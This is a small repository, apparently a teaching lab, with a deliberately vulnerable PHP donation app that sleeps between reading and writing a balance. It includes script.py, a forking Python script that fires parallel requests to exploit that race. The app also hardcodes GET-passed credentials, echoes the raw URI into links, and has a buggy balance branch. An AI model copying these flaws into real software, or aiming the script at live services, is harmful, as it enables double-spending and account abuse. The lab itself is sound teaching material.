├── README.md
├── account.txt
├── amount.txt
├── cpanel.php
├── index.php
├── ishaq_account.txt
├── reset.php
└── script.py


/README.md:
--------------------------------------------------------------------------------
1 | # Race-conditional-vulnerable-Web-application-
2 | This application is developed to test the race condition vulnerability in the web application. We have discussed about this vulnerability in our blog.
3 | 


--------------------------------------------------------------------------------
/account.txt:
--------------------------------------------------------------------------------
1 | 
2 | 5000
3 | 5000
4 | 5000


--------------------------------------------------------------------------------
/amount.txt:
--------------------------------------------------------------------------------
1 | 5000


--------------------------------------------------------------------------------
/cpanel.php:
--------------------------------------------------------------------------------
  1 | <?php
  2 | function start_donating()
  3 | {
  4 |     $actual_link = "http://$_SERVER[HTTP_HOST]$_SERVER[REQUEST_URI]";
  5 |     if (strpos($actual_link, 'donate') !== false)
  6 |     {
  7 |  
  8 |  
  9 |     }
 10 |     else
 11 |     {
 12 |         return;
 13 |     }
 14 |     $fil = fopen('amount.txt', 'r');
 15 |     $dat = fread($fil, filesize('amount.txt'));
 16 |  
 17 |     if ($dat< 5000)
 18 |     {
 19 |         echo "<br>";
 20 |         echo "Insufficient funds. for donating";
 21 |  
 22 |     }
 23 |     else
 24 |     {
 25 |  
 26 |         $new_money = $dat-5000;
 27 |         $bull = fopen('amount.txt', 'w');      
 28 |         sleep(3);
 29 |         fwrite($bull, $new_money);
 30 |         fclose($bull);
 31 |        
 32 |         $acc1 = fopen('account.txt', 'r');
 33 |         $dat = fread($acc1, filesize('account.txt'));
 34 |         $add_money =$dat."\n"."5000";
 35 |         $acc = fopen('account.txt', 'w');      
 36 |         fwrite($acc, $add_money);
 37 |         fclose($acc);
 38 |     }
 39 | }
 40 |  
 41 | if( $_GET["name"] || $_GET["pass"] )
 42 | {
 43 |     $name = $_GET["name"];
 44 |     $pass = $_GET["pass"];
 45 |    
 46 |     if (($name == "root" || $name == "ROOT") && $pass == "password")
 47 |     {
 48 |  
 49 |         echo "<h1><center>Race Condition Demo</center></h1>";
 50 |         echo "Welcome , ".$name;
 51 |         echo "<br>";
 52 |         echo "<br>";
 53 |         echo "<a href='./reset.php'>Reset balance";
 54 |         echo "<br>";
 55 |         echo "<br>";
 56 |         $actual_link = "http://$_SERVER[HTTP_HOST]$_SERVER[REQUEST_URI]";
 57 |         $actual_link  = $actual_link . "&donate=true";
 58 |         echo "<a href='".$actual_link."'>Donate Rs 5k to XYZ Organization</a>";
 59 |         echo "<br>";
 60 |         echo "<a href='".$actual_link."'>Donate Rs 5k to Ishaq</a>";
 61 |  
 62 |         if (strpos($actual_link, 'donate') !== false)
 63 |         {
 64 |  
 65 |             start_donating();
 66 |  
 67 |         }
 68 |  
 69 |         $fil = fopen('amount.txt', 'r');
 70 |         $dat = fread($fil, filesize('amount.txt'));
 71 |         echo "<br>";
 72 |         echo "You have ".$dat." in your balance";
 73 |  
 74 |  
 75 |     }
 76 |     else if(($name == "ishaq" || $name == "ISHAQ") && $pass == "pass") {
 77 |     if(file_exists('account.txt') && file_exists('ishaq_account.txt')) {
 78 |         $account = fopen('account.txt', 'r');
 79 |            
 80 |         $x= fread($account, filesize('account.txt'));
 81 |  
 82 |         $account = fopen('account.txt', 'r');
 83 |            
 84 |         $y= fread($account, filesize('ishaq_account.txt'));
 85 |        
 86 |  $req=explode( '\n', $x );
 87 |  
 88 | foreach($req as $x){
 89 |  if (!isset($line)) {  $line =0; }
 90 | $y +=$line;
 91 | }
 92 |  
 93 |         echo "<br>";
 94 |         echo "You have ".$line." in your balance";
 95 |     } else {
 96 |         $acc = fopen('account.txt', 'w');      
 97 |         fwrite($acc, 0);
 98 |         fclose($acc);
 99 |         echo "You have 0 in your balance";
100 |        
101 |         $acc = fopen('ishaq_account.txt', 'w');      
102 |         fwrite($acc, 0);
103 |         fclose($acc);
104 |     }
105 | }
106 |     else
107 |     {
108 |  
109 |         echo "Username or password you entered is incorrect";
110 |     }
111 |  
112 |  
113 | }


--------------------------------------------------------------------------------
/index.php:
--------------------------------------------------------------------------------
 1 | <?php
 2 | if( (isset($_GET["name"]) && !empty($_GET["name"])) || (isset($_GET["pass"]) && !empty($_GET["pass"]))) 
 3 | {
 4 |     $name = $_GET["name"];
 5 |     $pass = $_GET["pass"];
 6 |     if ((($name == "root" || $name == "ROOT") && $pass == "password") || (($name == "ishaq" || $name == "ISHAQ") && $pass == "pass")) {
 7 |         ob_start();
 8 |         $url = "./cpanel.php?name=".$name."&pass=".$pass;
 9 |         header('Location: '.$url);
10 |         ob_end_flush();
11 |         die();
12 | 
13 | }
14 |     else 
15 |     {
16 |         echo "Username or password you entered is incorrect";
17 |     }
18 |     exit();
19 | }
20 | ?>
21 | <html>
22 | <body>
23 | <center>
24 |     <h1>Race Condition Demo</h1>
25 |     <br>
26 | 
27 |     <br>
28 | <form action = "<?php $_PHP_SELF ?>" method = "GET">
29 |     Username: <input type = "text" name = "name" />
30 |     Password: <input type = "password" name = "pass" />
31 |     <input type = "submit" />
32 | </form>
33 | 
34 |     
35 | </center>
36 | </body>
37 | </html>


--------------------------------------------------------------------------------
/ishaq_account.txt:
--------------------------------------------------------------------------------
1 | 0


--------------------------------------------------------------------------------
/reset.php:
--------------------------------------------------------------------------------
 1 | <?php
 2 | $fil = fopen('amount.txt', 'w');
 3 | fwrite($fil, 10000);
 4 | fclose($fil);
 5 | 
 6 | ob_start();
 7 | $url = "./index.php";
 8 | header('Location: '.$url);
 9 | ob_end_flush();
10 | die();


--------------------------------------------------------------------------------
/script.py:
--------------------------------------------------------------------------------
 1 | import urllib2
 2 | import os
 3 | url = "http://localhost/race_cond/cpanel.php?name=root&pass=password&donate=true&id=2"
 4 | response = urllib2.urlopen("http://localhost/race_cond/reset.php")
 5 | html = response.read()
 6 | 
 7 | os.fork()
 8 | os.fork()
 9 | os.fork()
10 | os.fork()
11 | urllib2.urlopen(url)	


--------------------------------------------------------------------------------